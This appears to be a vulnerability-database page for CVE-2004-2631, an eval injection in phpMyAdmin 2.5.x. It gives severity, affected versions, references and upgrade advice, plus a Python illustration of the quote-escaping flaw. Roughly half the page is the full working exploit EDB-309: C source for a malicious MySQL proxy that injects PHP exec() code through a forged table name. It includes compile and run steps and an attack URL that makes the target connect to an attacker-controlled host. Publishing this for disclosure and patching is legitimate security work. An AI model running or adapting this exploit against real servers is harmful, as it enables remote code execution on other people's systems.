CVE-2004-2631
CVSS 7.5
Published: 2004-12-31 00:00:00
Revised: 2016-10-17 23:07:12

[Original] Eval injection vulnerability in left.php in phpMyAdmin 2.5.1 up to 2.5.7, when LeftFrameLight is FALSE, allows remote attackers to execute arbitrary PHP code via a crafted table name.


[CNNVD] phpMyAdmin multiple input validation vulnerabilities (CNNVD-200412-333)

        phpMyAdmin versions 2.5.1 through 2.5.7 have an eval injection vulnerability in left.php when LeftFrameLight is set to FALSE. A remote attacker can execute arbitrary PHP code by means of a malformed table name.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:phpmyadmin:phpmyadmin:2.5.5_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.2_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.2
cpe:/a:phpmyadmin:phpmyadmin:2.5.1
cpe:/a:phpmyadmin:phpmyadmin:2.5.4
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.3
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.5
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2631
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2631
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-333
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2004-06/0444.html
(UNKNOWN)  BUGTRAQ  20040628 php codes injection in phpMyAdmin version 2.5.7.
http://archives.neohapsis.com/archives/bugtraq/2004-06/0473.html
(UNKNOWN)  BUGTRAQ  20040630 Re: php codes injection in phpMyAdmin version 2.5.7.
http://eagle.kecapi.com/sec/fd/phpMyAdmin.html
(UNKNOWN)  MISC  http://eagle.kecapi.com/sec/fd/phpMyAdmin.html
http://marc.info/?l=bugtraq&m=109816584519779&w=2
(UNKNOWN)  BUGTRAQ  20041018 phpMyAdmin: Vulnerability in MIME-based transformation
http://securitytracker.com/id?1010614
(UNKNOWN)  SECTRACK  1010614
http://www.gentoo.org/security/en/glsa/glsa-200407-22.xml
(UNKNOWN)  GENTOO  GLSA-200407-22
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-1
(PATCH)  CONFIRM  http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-1
http://www.securiteam.com/unixfocus/5QP040ADFW.html
(UNKNOWN)  MISC  http://www.securiteam.com/unixfocus/5QP040ADFW.html
http://www.securityfocus.com/bid/10629
(PATCH)  BID  10629
http://xforce.iss.net/xforce/xfdb/16542
(PATCH)  XF  phpmyadmin-php-injection(16542)

- Vulnerability information

phpMyAdmin multiple input validation vulnerabilities
High severity; input validation
2004-12-31 00:00:00 2005-12-21 00:00:00
Remote
        phpMyAdmin versions 2.5.1 through 2.5.7 have an eval injection vulnerability in left.php when LeftFrameLight is set to FALSE. A remote attacker can execute arbitrary PHP code by means of a malformed table name.

- Advisories and patches

        The vendor has released version 2.5.7, patch level 1, addressing this vulnerability. Users of affected packages are urged to upgrade.
        Gentoo has released an advisory (GLSA 200407-22) and an updated ebuild to address the issues that are described in this BID. Gentoo users are advised to perform the following actions as a superuser in order to apply the appropriate fixes.
        emerge sync
        emerge -pv ">=dev-db/phpmyadmin-2.5.7_p1"
        emerge ">=dev-db/phpmyadmin-2.5.7_p1"
        Affected versions:
        phpMyAdmin 2.5.1, 2.5.2, 2.5.4, 2.5.5-rc1, 2.5.5-rc2, 2.5.5, 2.5.5-pl1, 2.5.6-rc1, 2.5.7

- Vulnerability information (309)

phpMyAdmin 2.5.7 Remote code injection Exploit (EDBID:309)
php webapps
2004-07-04 Verified
Author: Nasir Simbolon
/*    
 * phpmy-explt.c  
 * written by Nasir Simbolon <nasir kecapi com>
 * eagle kecapi com
 * Jakarta, Indonesia
 * 
 * June, 10 2004 
 * 
 * A phpMyAdmin-2.5.7 exploit program.
 * This is a kind of mysql server wrapper that acts like a proxy, except that it sends a fake table name
 * when the client queries "SHOW TABLES", by replacing the real table name with a string containing exploit code.
 *
 * Compile : gcc phpmy-explt.c -o phpmy-explt
 *
 * run with
 * ./phpmy-explt
 *
 * and go to your target and put 
 *
 * http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=
 * attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers]
 * [4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&cfg[Servers]
 * [4][only_db]=databasename
 *
 * fill host,port,user,pass and databasename correctly
 * (databasename must be the same as DATABASE below, since the forged reply embeds it)
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <netdb.h>

#define BIND_PORT 8889
#define MYSQL_PORT 3306
#define HOSTNAME "localhost"
#define DATABASE "phpmy"


#define BUFFER_LEN 1024

/* This is php code we want to inject into phpMyAdmin 
   Do NOT use  single quote (') in the string, use double quote (") instead
*/
char *phpcodes = "exec(\"touch /tmp/your-phpmyadmin-is-vulnerable\");";


  /* This is examples codes I captured when mysql server
     reply to client's request of query "SHOW TABLES" query.
     It shows  database  name 'phpmy' and contain one tablename  'mytable'
     Our aim is to manipulate the data received from mysql server
     by replacing 'mytable' with our exploide codes.
     
     0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
     0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
     '_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 ,
     0x1 ,-2  ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 ,
     -2  ,8  ,0x0 ,0x0 ,0x4 ,7   ,'m' ,'y' ,'t' ,'a' ,
     'b' ,'l' ,'e' ,0x1 ,0   ,0   ,0x5 ,-2
  */


int build_exploite_code(char* dbname,char* phpcodes,char** expcode)
{
   /* packet 1: column count (1). Then the header of packet 2 (the column
      definition, seq 2) and the start of its payload: an empty table name and
      the column name "Tables_in_<dbname>". Bytes 5 and 10 are the packet length
      and the column-name length for dbname "phpmy"; they are recomputed below. */
   char my1[21] = {0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
                   0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
                   '_'};
   /* part of dbname     ('p' ,'h' ,'p' ,'m' ,'y') */
   /* rest of the column definition (length 64, type 0xfe = VAR_STRING,
      flags/decimals) followed by the EOF packet (seq 3) that ends it */
   char my2[15] = {0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2  ,0x3 ,0x1 ,0x0 ,0x1f,
                   0x1 ,0x0 ,0x0 ,0x3 ,-2};
   /* part of int phpcodes string length +1   (8) : low byte of the row packet length */
   char my3[3]  = {0x0 ,0x0 ,0x4};   /* upper length bytes and sequence id 4 */
   /* part of int phpcodes string length      (7) : length prefix of the value */
   /* part of tablename    ('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */
   char my4[5]  = {0x1 ,0   ,0   ,0x5 ,-2};   /* EOF packet (seq 5) ending the rows */

   int len,i;
   size_t dblen = strlen(dbname), pclen = strlen(phpcodes);

   /* all lengths are written as single bytes below, so the injected value
      (backslash, quote, semicolon, phpcodes, comment opener: 5 framing bytes)
      must stay below 251 bytes, and so must the column name "Tables_in_<dbname>" */
   if (pclen + 5 > 250 || dblen > 220) {
      fprintf(stderr,"php code or database name too long for this packet layout\n");
      exit(1);
   }
   my1[5]  = (char)(22 + dblen);   /* packet 2 payload length (27 for "phpmy") */
   my1[10] = (char)(10 + dblen);   /* length of "Tables_in_<dbname>" (15 for "phpmy") */

   len = 21 + dblen + 15 + 1 + 3 + 1 + pclen + 5 + 5;
   *expcode = (char*) malloc(len);
   if (*expcode == NULL) { perror("malloc()"); exit(1); }

   i = 0;
   memcpy(*expcode + i,my1,21);
   i += 21;
   memcpy(*expcode + i,dbname,dblen);
   i += dblen;
   memcpy(*expcode + i,my2,15);
   i += 15;
   (*expcode)[i++] = (char)(5 + pclen + 1);   /* row packet payload length */
   memcpy(*expcode + i,my3,3);
   i += 3;
   (*expcode)[i++] = (char)(5 + pclen);       /* length prefix of the value */
   /* this is our exploit code: close the single-quoted PHP literal the name
      lands in, run phpcodes, and comment out the rest of the statement */
   (*expcode)[i++] = '\\';
   (*expcode)[i++] = '\'';
   (*expcode)[i++] = ';';
   memcpy(*expcode + i,phpcodes,pclen);
   i += pclen;
   (*expcode)[i++] = '/';
   (*expcode)[i++] = '*';
   memcpy(*expcode + i,my4,5);

   return len;
}

/* connect to mysql server*/

int connect_mysql()
{
    int s2;
    struct sockaddr_in ina;
    struct hostent *h;

    h = gethostbyname(HOSTNAME);
    if (h == NULL) {
        fprintf(stderr,"gethostbyname(%s) failed\n",HOSTNAME);
        exit(1);
    }
    /* set internet address */
    memset(&ina,0,sizeof(ina));
    memcpy(&ina.sin_addr,h->h_addr,h->h_length);
    ina.sin_family = AF_INET;
    ina.sin_port = htons(MYSQL_PORT);
    if((s2=socket(AF_INET,SOCK_STREAM,0)) < 0) {
        perror("socket()");
        exit(1);
    }
    if(connect(s2,(struct sockaddr *)&ina,sizeof(ina)) < 0 ) {
        perror("connect()");
        exit(1);
    }
    return s2;
}

/* listener */
int listener()
{
    int s1;
    int opt;
    struct sockaddr_in ina;

    /* set internet address */
    ina.sin_family = AF_INET;
    ina.sin_port = htons(BIND_PORT);
    ina.sin_addr.s_addr = INADDR_ANY;

    if((s1=socket(AF_INET,SOCK_STREAM,0)) < 0) 
  	perror("Socket: ");
    
    opt = 1;
    setsockopt(s1,SOL_SOCKET, SO_REUSEADDR , (char *)&opt, sizeof(opt) );
       
    if(bind(s1,(struct sockaddr *)&ina,sizeof(ina))==-1) 
	perror("Bind: ");
	
    if(listen(s1, 10) == -1) 
  	perror("Listen"); 
	
   return s1;
}


int main(int argc,char* argv[])
{
	struct sockaddr_in ina1;
	socklen_t ina1_l;
	int s_daemon,s_mysql;
	ssize_t byte_read;
	char *buf;
	int sc,event,n_select;
	fd_set rfds;
	int exptlen,i;
	char *expt;
	char *dbname=DATABASE;

	buf = (char*) malloc(BUFFER_LEN);
	if (buf == NULL) { perror("malloc()"); return 1; }

	/* we listen to port */
	s_daemon = listener();

	/* the forged reply is built once; it is at most a few hundred bytes, so it fits in buf */
	exptlen = build_exploite_code(dbname,phpcodes,&expt);

	for(;;) 
	{
	   fprintf(stderr,"waiting for connection\n");

	   ina1_l = sizeof(ina1);
	   if( -1 == (sc = accept(s_daemon,(struct sockaddr *) &ina1,&ina1_l)) ) 
	   {
		  perror("accept()");
		  continue;
	   }
	   /* if we get here, we have a new connection */
	   fprintf(stderr,"got client connection\n");
mysql:
	   /* connect to mysql */
	   s_mysql = connect_mysql();
        
	   for(;;) 
	    {
	   	FD_ZERO(&rfds);
	        FD_SET(sc,&rfds);
  	   	FD_SET(s_mysql,&rfds);                                
		
	        n_select = (sc > s_mysql)? sc : s_mysql;

	    	event = select(n_select+1,&rfds,NULL,NULL,NULL);
	    	if(-1  == event) 
		    perror("select()");
	        else 
		{	
		    if(FD_ISSET(s_mysql,&rfds)) 
		     {
			byte_read = read(s_mysql,buf,BUFFER_LEN);
		    	/* server closed the connection (0) or the read failed (-1): reconnect to mysql */
		    	if(byte_read <= 0) 
	  	        {
			   shutdown(s_mysql,SHUT_RDWR);
			   close(s_mysql);
			   goto mysql;
		        }

			 /* check data received from mysql server.
			  * if buf[11] contains 'T', the data received from the mysql server is the table list
			  * (this assumes the whole SHOW TABLES reply arrived in one read and that the
			  * column name "Tables_in_..." starts at offset 11, i.e. the pre-4.1 column layout)
			  *
			  * NOW we replace the table with our exploit code and send it to the client
			  */
		        if( 'T' == buf[11])
			{
		           for(i=0;i<exptlen;i++) 
		              buf[i] = expt[i];
		           byte_read = exptlen;
		        }
		       
		        if(write(sc, buf, byte_read) < 0)
		           break; 
		     }
	           
	             if(FD_ISSET(sc,&rfds)) 
		     {	
	   	         byte_read = read(sc,buf,BUFFER_LEN);
		         /* client closed the connection or the read failed: close both sides */
		         if(byte_read <= 0) 
		         {	
			    close(sc);    
			    shutdown(s_mysql,SHUT_RDWR);
			    close(s_mysql);
			    break;
		         }

		       if(write(s_mysql,buf,byte_read) < 0) 
			       break; 	    
		     }    
#if defined(DEBUG)		     
		     fprintf(stderr,"data:\n");	
		     for(i=0;i<byte_read;i++) 
			     fprintf(stderr," %c(%x) ",buf[i],buf[i]);
#endif    
	        }   

	    } 
	}
	free(buf);
	free(expt);
	return 0;
}

// milw0rm.com [2004-07-04]

- Vulnerability information

7314
phpMyAdmin left.php Code Injection
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

phpMyAdmin contains a flaw that allows a remote attacker to inject arbitrary PHP code. If $cfg['LeftFrameLight'] in the 'config.lib.php' script is set to false, a remote attacker can supply a specially crafted HTTP request that causes malicious PHP code, carried in a table name, to reach an eval() call in the 'left.php' script, resulting in a loss of integrity.
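
How a crafted table name breaks out of a single-quoted PHP literal that is handed to eval(), as an added example in Python; this is not code from the page, from the exploit author or from phpMyAdmin. The page does not reproduce the vulnerable left.php code, so the generated statement shape ($tables['...'] = 1;) is hypothetical. The leading backslash in the exploit's payload (\'; then code, then /*) only makes sense if the generated code escaped single quotes but not backslashes, and that is the assumption modelled as escape_quotes_only below. The scanner follows the PHP lexer's rules for single-quoted literals (only backslash-backslash and backslash-quote are escapes) and reports whatever ends up outside the literal; an addslashes-style escaper that doubles backslashes closes this particular breakout, but putting untrusted names through eval() at all is the defect.

```python
from __future__ import annotations

# Constructed payload shaped like the one the exploit on this page injects as a table name.
PAYLOAD = "\\';exec(\"touch /tmp/x\");/*"


def escape_quotes_only(name: str) -> str:
    """Weak escaper: puts a backslash before ' but leaves backslashes alone.
    Assumed (not shown on the page) to be the pattern the payload's leading backslash targets."""
    return name.replace("'", "\\'")


def escape_addslashes(name: str) -> str:
    """PHP addslashes() rules: backslash, single quote and double quote get a backslash in front;
    NUL becomes backslash-zero."""
    return (name.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"')
                .replace("\0", "\\0"))


def build_statement(table: str, escaper) -> str:
    """Hypothetical line a generate-PHP-then-eval() design would emit for one table."""
    return "$tables['" + escaper(table) + "'] = 1;"


def single_quoted_end(src: str, start: int) -> int:
    """Index of the quote that closes the PHP single-quoted literal opened at src[start].
    Inside such a literal PHP recognises exactly two escapes: backslash-backslash and backslash-quote."""
    assert src[start] == "'"
    i = start + 1
    while i < len(src):
        if src[i] == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            i += 2
            continue
        if src[i] == "'":
            return i
        i += 1
    raise ValueError("unterminated single-quoted literal")


def injected_code(statement: str) -> str | None:
    """Return the PHP that lands outside the literal, or None if the name stayed data."""
    end = single_quoted_end(statement, statement.index("'"))
    tail = statement[end + 1:]
    return None if tail == "] = 1;" else tail


if __name__ == "__main__":
    for label, esc in (("quotes only", escape_quotes_only), ("addslashes", escape_addslashes)):
        print(f"{label:12s} {injected_code(build_statement(PAYLOAD, esc))!r}")
```

With escape_quotes_only the payload becomes two backslashes followed by a quote: the lexer reads the pair as one literal backslash, the quote then terminates the string, and everything up to the closing /* executes as code. With escape_addslashes the attacker's backslash is doubled as well, so the escaped quote stays inside the literal.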

- Timeline

2004-06-28 Unknown
2004-06-28 Unknown

- Solution

Upgrade to version 2.5.7 Patch Level 1, 2.6.0-rc1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

